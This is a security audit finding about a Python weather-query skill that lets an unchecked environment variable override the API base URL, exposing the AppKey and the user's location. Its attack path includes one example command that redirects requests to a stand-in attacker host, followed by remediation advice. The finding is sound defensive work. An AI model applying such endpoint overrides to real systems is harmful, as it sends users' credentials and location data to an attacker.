T09 · Insecure Skill Coding Practices
- Location
scripts/weather_query.py:28- Finding
Attacker-Controlled API Base URL Can Expose Credentials and Location Data
- Content
View full analysis
Vulnerability Details
File Location:
scripts/weather_query.py, lines 28 and 165–169
Vulnerability Type: Unvalidated API endpoint override and sensitive data exposure
Risk Level: MediumVulnerable Code
python API_BASE_URL = os.environ.get("JIKE_API_BASE_URL", "https://api.jikeapi.cn").rstrip("/")python path = API_PATH_MAP[query_type] params = {"province": province, "city": city, "appkey": appkey} if area: params["area"] = area url = f"{API_BASE_URL}{path}?{urllib.parse.urlencode(params)}" try: with urllib.request.urlopen(url, timeout=15) as response: return json.loads(response.read().decode("utf-8"))Technical Analysis
The script permits the
JIKE_API_BASE_URLenvironment variable to replace the trusted API origin. It does not validate the resulting URL's scheme or hostname before making the request.The request URL contains the AppKey and user-supplied location information in its query string. A process, wrapper, deployment configuration, or other actor capable of influencing the execution environment can redirect an otherwise legitimate weather query to an arbitrary endpoint. The override can also specify plain HTTP, removing transport confidentiality.
Independently, placing the AppKey in a query string increases the chance that it will be retained in web-server, reverse-proxy, monitoring, or diagnostic logs.
Attack Path
- An attacker gains the ability to define environment variables for the skill process, such as through a compromised wrapper, launcher, or deployment configuration.
- The attacker sets
JIKE_API_BASE_URLto an endpoint they control, for example:bash export JIKE_API_BASE_URL=http://attacker.example - A user or agent invokes the normal weather-query command.
- The script appends the legitimate weather API path and constructs a request containing
province,city, optionalarea, andappkey.
...[truncated 841 chars]
- Remediation
View remediation
Remediation Suggestions
- Remove the
JIKE_API_BASE_URLoverride if custom endpoints are not required. - If an override is operationally necessary, parse it with
urllib.parse.urlsplit()and enforce:- The
httpsscheme. - An exact allowlisted hostname, such as
api.jikeapi.cn. - An expected port.
- No embedded username or password.
- No unexpected path, query string, or fragment.
- The
- Construct the final URL from a fixed, trusted origin and the predefined paths in
API_PATH_MAP. - Prefer transmitting the AppKey in a dedicated authorization header if the upstream API supports it, rather than in the URL query string.
- Ensure logs, exception reporting, proxies, and monitoring systems redact credentials.
- Treat deployment environment configuration as security-sensitive and prevent untrusted users or processes from modifying variables supplied to the skill.
- Add tests confirming that HTTP URLs, unapproved hosts, embedded credentials, and malformed endpoint overrides are rejected before any request is made.
- Remove the
